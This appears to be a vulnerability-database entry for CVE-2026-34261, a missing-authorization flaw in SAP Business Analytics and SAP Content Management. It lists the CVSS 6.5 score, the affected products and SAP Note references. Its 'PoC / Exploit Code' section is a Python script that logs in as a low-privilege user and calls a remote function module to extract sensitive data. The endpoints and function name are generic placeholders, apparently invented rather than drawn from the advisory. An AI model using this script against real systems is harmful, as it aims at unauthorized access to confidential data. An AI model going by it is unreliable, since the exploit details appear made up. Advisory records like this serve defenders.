Security Vulnerability Report
CVE-2026-34261 CVSS 6.5 MEDIUM

Published: 2026-04-14 01:16:04
Last Modified: 2026-04-17 15:18:17

Description

Due to a missing authorization check in SAP Business Analytics and SAP Content Management, an authenticated user could make unauthorized calls to certain remote function modules, potentially accessing sensitive information beyond their intended permissions. This vulnerability affects confidentiality, with no impact on integrity and availability.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

No configuration data available.

SAP Business Analytics (for affected versions see SAP Note 3705094)
SAP Content Management (for affected versions see SAP Note 3705094)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "https://<target_host>/sap/bc/webdynpro_abap/sap/some_vulnerable_module"
username = "low_priv_user"
password = "password123"

# Create a session to simulate an authenticated user
session = requests.Session()

# Perform authentication (simplified)
login_payload = {"sap-user": username, "sap-password": password}
session.post(target_url + "/login", data=login_payload)

# Exploit: call the unprotected remote function module
# This module is usually restricted but lacks an authorization check
exploit_payload = {"rfc_function": "SENSITIVE_DATA_EXTRACTOR", "param1": "all"}
response = session.post(target_url + "/execute", json=exploit_payload)

# Check whether sensitive data is leaked
if response.status_code == 200 and "sensitive_data" in response.text:
    print("POC Successful: Authorization bypassed.")
else:
    print("POC Failed.")

References

https://me.sap.com/notes/3705094 (SAP Note 3705094)
https://url.sap/sapsecuritypatchday (SAP Security Patch Day)